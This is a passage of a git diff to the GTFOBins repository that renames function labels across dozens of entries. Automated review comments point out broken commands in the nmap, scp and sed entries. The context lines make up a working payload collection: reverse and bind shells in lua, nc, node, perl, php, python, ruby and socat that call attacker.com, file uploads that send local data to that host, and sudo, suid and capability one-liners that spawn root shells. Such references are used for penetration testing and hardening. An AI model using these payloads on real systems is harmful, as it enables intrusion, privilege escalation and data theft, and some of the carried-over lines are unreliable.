@@ -49,8 +49,8 @@ functions: code: | export LFILE=file_to_read ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' - suid-enabled: + suid: - code: ./ksh -p - sudo-enabled: + sudo: - code: sudo ksh ---
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md
index b57e5b9..c251e78 100644
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@@ -7,10 +7,10 @@ description: | /lib64/ld-linux-x86-64.so.2 ``` functions: - execute-interactive: + shell: - code: /lib/ld.so /bin/sh - suid-enabled: + suid: - code: ./ld.so /bin/sh -p - sudo-enabled: + sudo: - code: sudo /lib/ld.so /bin/sh ---
diff --git a/_gtfobins/less.md b/_gtfobins/less.md
index 9e7aaeb..04de295 100644
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | less /etc/profile !/bin/sh
@@ -14,10 +14,10 @@ functions: echo DATA | less sfile_to_write q - sudo-enabled: + sudo: - code: | sudo less /etc/profile !/bin/sh - suid-enabled: + suid: - code: ./less file_to_read ---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
index f7b420b..1052235 100644
--- a/_gtfobins/ltrace.md
+++ b/_gtfobins/ltrace.md
@@ -1,7 +1,7 @@ --- functions: - execute-interactive: + shell: - code: ltrace -b -L /bin/sh - sudo-enabled: + sudo: - code: sudo ltrace -b -L /bin/sh ---
diff --git a/_gtfobins/lua.md b/_gtfobins/lua.md
index 82c68d8..17ff92f 100644
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: lua -e 'os.execute("/bin/sh")' - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed. code: | export RHOST=attacker.com
@@ -15,7 +15,7 @@ functions: local b=assert(f:read("*a"));t:send(b); end; f:close();t:close();' - bind-shell-non-interactive: + non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed. code: | export LPORT=12345
@@ -26,7 +26,7 @@ functions: local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();' - upload: + file-upload: - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed. code: | RHOST=attacker.com
@@ -41,7 +41,7 @@ functions: t:connect(os.getenv("RHOST"),os.getenv("RPORT")); t:send(d); t:close();' - download: + file-download: - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed. code: |
@@ -59,8 +59,8 @@ functions: - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);' file-read: - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' - sudo-enabled: + sudo: - code: sudo lua -e 'os.execute("/bin/sh")' - suid-limited: + limited-suid: - code: ./lua -e 'os.execute("/bin/sh")' ---
diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md
index c6f46d1..10a2bff 100644
--- a/_gtfobins/mail.md
+++ b/_gtfobins/mail.md
@@ -1,13 +1,13 @@ --- functions: - execute-interactive: + shell: - description: This creates a valid Mbox file which may be required by the binary. code: | TF=$(mktemp) echo "From nobody@localhost $(date)" > $TF mail -f $TF !/bin/sh - sudo-enabled: + sudo: - description: This creates a valid Mbox file which may be required by the binary. code: | TF=$(mktemp)
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index 6f89ca6..fe08eb7 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -1,7 +1,7 @@ --- description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`. functions: - execute-interactive: + shell: - code: | COMMAND='/bin/sh' make -s --eval=$'x:\n\t-'"$COMMAND"
@@ -10,11 +10,11 @@ functions: code: | LFILE=file_to_write make -s --eval="\$(file >$LFILE,DATA)" . - suid-enabled: + suid: - code: | COMMAND='/bin/sh -p' ./make -s --eval=$'x:\n\t-'"$COMMAND" - sudo-enabled: + sudo: - code: | COMMAND='/bin/sh' sudo make -s --eval=$'x:\n\t-'"$COMMAND"
diff --git a/_gtfobins/man.md b/_gtfobins/man.md
index c93bb1c..4734fd0 100644
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -1,16 +1,16 @@ --- functions: - execute-interactive: + shell: - code: | man man !/bin/sh file-read: - code: man file_to_read - sudo-enabled: + sudo: - code: | sudo man man !/bin/sh - suid-limited: + limited-suid: - code: | ./man man !/bin/sh
diff --git a/_gtfobins/more.md b/_gtfobins/more.md
index 217a18d..1a37f2f 100644
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: | TERM= more /etc/profile !/bin/sh file-read: - code: more file_to_read - suid-enabled: + suid: - code: ./more file_to_read - sudo-enabled: + sudo: - code: | TERM= sudo -E more /etc/profile !/bin/sh
diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md
index 1af15a4..9655adc 100644
--- a/_gtfobins/mount.md
+++ b/_gtfobins/mount.md
@@ -1,6 +1,6 @@ --- functions: - sudo-enabled: + sudo: - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. code: | sudo mount -o bind /bin/sh /bin/mount
diff --git a/_gtfobins/mv.md b/_gtfobins/mv.md
index f4ce08a..546cad9 100644
--- a/_gtfobins/mv.md
+++ b/_gtfobins/mv.md
@@ -1,13 +1,13 @@ --- description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges. functions: - suid-enabled: + suid: - code: | LFILE=file_to_write TF=$(mktemp) echo "DATA" > $TF ./mv $TF $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_write TF=$(mktemp)
diff --git a/_gtfobins/mysql.md b/_gtfobins/mysql.md
index dbfc571..533dea4 100644
--- a/_gtfobins/mysql.md
+++ b/_gtfobins/mysql.md
@@ -1,10 +1,10 @@ --- description: A valid MySQL server must be available. functions: - execute-interactive: + shell: - code: mysql -e '\! /bin/sh' - sudo-enabled: + sudo: - code: sudo mysql -e '\! /bin/sh' - suid-limited: + limited-suid: - code: ./mysql -e '\! /bin/sh' ---
diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md
index 928ecc3..143ea56 100644
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp) echo 'exec sh' > $TF
@@ -14,14 +14,14 @@ functions: ^O file-read: - code: nano file_to_read - suid-enabled: + suid: - code: | TF=$(mktemp) echo 'exec sh -p' > $TF chmod +x $TF ./nano -s $TF /etc/hosts ^T - sudo-enabled: + sudo: - code: | TF=$(mktemp) echo 'exec sh' > $TF
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index d0f253a..c5bb2ac 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -1,36 +1,36 @@ --- functions: - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com RPORT=12345 nc -e /bin/sh $RHOST $RPORT - bind-shell-interactive: + bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional. code: | LPORT=12345 nc -l -p $LPORT -e /bin/sh - upload: + file-upload: - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send nc $RHOST $RPORT < "$LFILE" - download: + file-download: - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: | LPORT=12345 LFILE=file_to_save nc -l -p $LPORT > "$LFILE" - sudo-enabled: + sudo: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com RPORT=12345 sudo nc -e /bin/sh $RHOST $RPORT - suid-limited: + limited-suid: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional. code: | RHOST=attacker.com
diff --git a/_gtfobins/nice.md b/_gtfobins/nice.md
index 47c08b2..8106c1e 100644
--- a/_gtfobins/nice.md
+++ b/_gtfobins/nice.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: nice /bin/sh - suid-enabled: + suid: - code: ./nice /bin/sh -p - sudo-enabled: + sudo: - code: sudo nice /bin/sh ---
diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md
index c612274..bd0e97a 100644
--- a/_gtfobins/nl.md
+++ b/_gtfobins/nl.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read nl -bn -w1 -s '' $LFILE - suid-enabled: + suid: - code: | LFILE=file_to_read ./nl -bn -w1 -s '' $LFILE - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo nl -bn -w1 -s '' $LFILE
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index 1eadeb1..1be2c9c 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -1,12 +1,12 @@ --- functions: - execute-interactive: + shell: - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com
@@ -21,7 +21,7 @@ functions: end; f:close();t:close();' > $TF nmap --script=$TF - bind-shell-non-interactive: + non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | export LPORT=12345
@@ -34,7 +34,7 @@ functions: local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();' > $TF nmap --script=$TF - upload: + file-upload: - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. code: | export RHOST=attacker.com
@@ -50,7 +50,7 @@ functions: t:send(d); t:close();' > $TF nmap --script=$TF - download: + file-download: - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. code: |
@@ -76,13 +76,13 @@ functions: TF=$(mktemp) echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF nmap --script=$TF - sudo-enabled: + sudo: - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF - suid-limited: + limited-suid: - description: Input echo is disabled. code: | TF=$(mktemp)
diff --git a/_gtfobins/node.md b/_gtfobins/node.md
index 64c1dd4..bde6d6f 100644
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: | node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com
@@ -14,7 +14,7 @@ functions: sh.stdout.pipe(this); sh.stderr.pipe(this); });' - bind-shell-interactive: + bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. code: | export LPORT=12345
@@ -24,13 +24,13 @@ functions: sh.stdout.pipe(client); sh.stderr.pipe(client); }).listen(process.env.LPORT);' - suid-enabled: + suid: - code: | ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' - sudo-enabled: + sudo: - code: | sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' - capabilities-enabled: + capabilities: - code: | ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' ---
diff --git a/_gtfobins/od.md b/_gtfobins/od.md
index 4a82e45..e1c0341 100644
--- a/_gtfobins/od.md
+++ b/_gtfobins/od.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read od -An -c -w9999 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./od -An -c -w9999 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo od -An -c -w9999 "$LFILE"
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index d12e1f8..018e02e 100644
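Review bot: The `file-read` context line carried onto the new side of the nmap.md `@@ -76,13 +76,13 @@` hunk has broken quoting: `echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF` closes its first single quote right after `lua -e `, so the shell sees unquoted parentheses and the file written to `$TF` is not the plain Lua that the neighbouring `nmap --script=$TF` entries pass. The `lua -e ` prefix looks copied over from lua.md, where it belongs. Suggested line: `echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF`. The enclosing `file-read` entry starts before this hunk.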
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -1,17 +1,17 @@ --- functions: - execute-interactive: + shell: - code: perl -e 'exec "/bin/sh";' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' - suid-enabled: + suid: - code: ./perl -e 'exec "/bin/sh";' - sudo-enabled: + sudo: - code: sudo perl -e 'exec "/bin/sh";' - capabilities-enabled: + capabilities: - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ---
diff --git a/_gtfobins/pg.md b/_gtfobins/pg.md
index 6ecf33a..78fa376 100644
--- a/_gtfobins/pg.md
+++ b/_gtfobins/pg.md
@@ -1,15 +1,15 @@ --- functions: - execute-interactive: + shell: - code: | pg /etc/profile !/bin/sh file-read: - code: pg file_to_read - sudo-enabled: + sudo: - code: | sudo pg /etc/profile !/bin/sh - suid-enabled: + suid: - code: ./pg file_to_read ---
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 7acdeb1..f0f1ade 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | export CMD="/bin/sh" php -r 'system(getenv("CMD"));'
@@ -16,37 +16,37 @@ functions: - code: | export CMD="/bin/sh" php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' - execute-non-interactive: + command: - code: | export CMD="id" php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' - upload: + file-upload: - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. code: | LHOST=0.0.0.0 LPORT=8888 php -S $LHOST:$LPORT - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' - suid-enabled: + suid: - code: | CMD="/bin/sh" ./php -r "system('$CMD');" - sudo-enabled: + sudo: - code: | CMD="/bin/sh" sudo php -r "system('$CMD');" - capabilities-enabled: + capabilities: - code: | CMD="/bin/sh" ./php -r "posix_setuid(0); system('$CMD');"
diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md
index e6dc547..479567c 100644
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp) echo 'exec sh' > $TF
@@ -14,14 +14,14 @@ functions: ^O file-read: - code: pico file_to_read - suid-enabled: + suid: - code: | TF=$(mktemp) echo 'exec sh -p' > $TF chmod +x $TF ./pico -s $TF /etc/hosts ^T - sudo-enabled: + sudo: - code: | TF=$(mktemp) echo 'exec sh' > $TF
diff --git a/_gtfobins/pip.md b/_gtfobins/pip.md
index dbb7b1b..5e76217 100644
--- a/_gtfobins/pip.md
+++ b/_gtfobins/pip.md
@@ -1,11 +1,11 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py pip install $TF - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com
@@ -16,7 +16,7 @@ functions: [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' > $TF/setup.py pip install $TF - upload: + file-upload: - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/
@@ -36,7 +36,7 @@ functions: else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py pip install $TF - download: + file-download: - description: Fetch a remote file via HTTP GET request. It needs an absolute local file path. code: | export URL=http://attacker.com/file_to_get
@@ -60,12 +60,12 @@ functions: TF=$(mktemp -d) echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py pip install $TF - load-library: + library-load: - code: | TF=$(mktemp -d) echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py pip install $TF - sudo-enabled: + sudo: - code: | TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md
index 416f606..7557675 100644
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: | puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" file-write:
@@ -13,7 +13,7 @@ functions: code: | export LFILE=file_to_read puppet filebucket -l diff /dev/null $LFILE - sudo-enabled: + sudo: - code: | sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" ---
diff --git a/_gtfobins/python.md b/_gtfobins/python.md
index f7f996d..1d8987b 100644
--- a/_gtfobins/python.md
+++ b/_gtfobins/python.md
@@ -1,9 +1,9 @@ --- description: The payloads are compatible with both Python version 2 and 3. functions: - execute-interactive: + shell: - code: python -c 'import os; os.system("/bin/sh")' - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com
@@ -12,7 +12,7 @@ functions: s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' - upload: + file-upload: - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/
@@ -28,7 +28,7 @@ functions: if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get
@@ -41,12 +41,12 @@ functions: - code: python -c 'open("file_to_write","w+").write("DATA")' file-read: - code: python -c 'print(open("file_to_read").read())' - load-library: + library-load: - code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - suid-enabled: + suid: - code: ./python -c 'import os; os.system("/bin/sh -p")' - sudo-enabled: + sudo: - code: sudo python -c 'import os; os.system("/bin/sh")' - capabilities-enabled: + capabilities: - code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")' ---
diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md
index 7dd28f8..03e3a16 100644
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@@ -1,14 +1,14 @@ --- functions: - execute-interactive: + shell: - code: rlwrap /bin/sh file-write: - description: This adds timestamps to the output file. This relies on the external `echo` command. code: | LFILE=file_to_write rlwrap -l "$LFILE" echo DATA - suid-enabled: + suid: - code: ./rlwrap -H /dev/null /bin/sh -p - sudo-enabled: + sudo: - code: sudo rlwrap /bin/sh ---
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index e852209..6e56eb0 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - suid-enabled: + suid: - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' - sudo-enabled: + sudo: - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' ---
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 9ec5af8..03fe575 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - suid-enabled: + suid: - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' - sudo-enabled: + sudo: - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' ---
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
index 7a9d051..658f5c9 100644
--- a/_gtfobins/rsync.md
+++ b/_gtfobins/rsync.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - sudo-enabled: + sudo: - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - suid-enabled: + suid: - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null ---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 1fe9fdb..b018d30 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -1,19 +1,19 @@ --- functions: - execute-interactive: + shell: - code: ruby -e 'exec "/bin/sh"' - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' - upload: + file-upload: - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. code: | export LPORT=8888 ruby -run -e httpd . -p $LPORT - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export RHOST=attacker.com
@@ -25,10 +25,10 @@ functions: - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' file-read: - code: ruby -e 'puts File.read("file_to_read")' - load-library: + library-load: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - sudo-enabled: + sudo: - code: sudo ruby -e 'exec "/bin/sh"' - capabilities-enabled: + capabilities: - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' ---
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index eba6c8e..d77922f 100644
--- a/_gtfobins/scp.md
+++ b/_gtfobins/scp.md
@@ -1,30 +1,30 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" scp -S $TF x y: - upload: + file-upload: - description: Send local file to a SSH server. code: | RPATH=user@attacker.com:~/file_to_save LPATH=file_to_send scp $LFILE $RPATH - download: + file-download: - description: Fetch a remote file from a SSH server. code: | RPATH=user@attacker.com:~/file_to_get LFILE=file_to_save scp $RPATH $LFILE - sudo-enabled: + sudo: - code: | TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y: - suid-limited: + limited-suid: - code: | TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF
diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md
index 2560133..61a2be9 100644
--- a/_gtfobins/sed.md
+++ b/_gtfobins/sed.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - description: GNU version only. Also, this requires `bash`. code: sed -n '1e exec sh 1>&0' /etc/hosts - execute-non-interactive: + command: - description: GNU version only. code: sed -n "1e id" /etc/hosts file-write:
@@ -14,11 +14,11 @@ functions: - code: | LFILE=file_to_read sed '' "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./sed -e '' "$LFILE" - sudo-enabled: + sudo: - description: GNU version only. Also, this requires `bash`. code: sudo sed -n '1e exec sh 1>&0 /etc/hosts ---
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
index 50ce9b2..32686fc 100644
--- a/_gtfobins/setarch.md
+++ b/_gtfobins/setarch.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: setarch $(arch) /bin/sh - suid-enabled: + suid: - code: ./setarch $(arch) /bin/sh -p - sudo-enabled: + sudo: - code: sudo setarch $(arch) /bin/sh ---
diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md
index 17d8fe4..fd0b4ad 100644
--- a/_gtfobins/sftp.md
+++ b/_gtfobins/sftp.md
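Review bot: In the scp.md hunk the `file-upload` entry assigns `LPATH=file_to_send` but then runs `scp $LFILE $RPATH`, so `$LFILE` expands to nothing and the command does not perform the upload it documents. It should read `scp $LPATH $RPATH`, matching the `file-download` entry directly below, which uses the variables it defines. Only the key was renamed here; the mismatched context line is pre-existing and is carried unchanged onto the new side.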
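Review bot: In the sed.md `@@ -14,11 +14,11 @@` hunk the `sudo` entry `code: sudo sed -n '1e exec sh 1>&0 /etc/hosts` is missing the closing single quote, unlike the `shell` variant in the file's first hunk, `sed -n '1e exec sh 1>&0' /etc/hosts`; as written the shell reports an unterminated quote instead of running sed. Suggested line: `code: sudo sed -n '1e exec sh 1>&0' /etc/hosts`. The context line predates this rename but lands on the new side unchanged.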
@@ -1,23 +1,23 @@ --- functions: - execute-interactive: + shell: - code: | HOST=user@attacker.com sftp $HOST !/bin/sh - upload: + file-upload: - description: Send local file to a SSH server. code: | RHOST=user@attacker.com sftp $RHOST put file_to_send file_to_save - download: + file-download: - description: Fetch a remote file from a SSH server. code: | RHOST=user@attacker.com sftp $RHOST get file_to_get file_to_save - sudo-enabled: + sudo: - code: | HOST=user@attacker.com sudo sftp $HOST
diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md
index 963a441..606eba7 100644
--- a/_gtfobins/shuf.md
+++ b/_gtfobins/shuf.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_write shuf -e DATA -o "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_write ./shuf -e DATA -o "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_write sudo shuf -e DATA -o "$LFILE"
diff --git a/_gtfobins/smbclient.md b/_gtfobins/smbclient.md
index b35fc1d..b1a267e 100644
--- a/_gtfobins/smbclient.md
+++ b/_gtfobins/smbclient.md
@@ -1,11 +1,11 @@ --- description: A valid SMB/CIFS server must be available. functions: - execute-interactive: + shell: - code: | smbclient \\ip\share !/bin/sh - sudo-enabled: + sudo: - code: | sudo smbclient \\ip\share !/bin/sh
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 1923073..f7185b3 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -1,23 +1,23 @@ --- functions: - reverse-shell-interactive: + reverse-shell: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane - bind-shell-interactive: + bind-shell: - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. code: | LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane - sudo-enabled: + sudo: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane - suid-limited: + limited-suid: - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | RHOST=attacker.com
diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md
index a352a5c..371c52d 100644
--- a/_gtfobins/sort.md
+++ b/_gtfobins/sort.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read sort -m "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./sort -m "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo sort -m "$LFILE"
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index d826e24..12daa5b 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
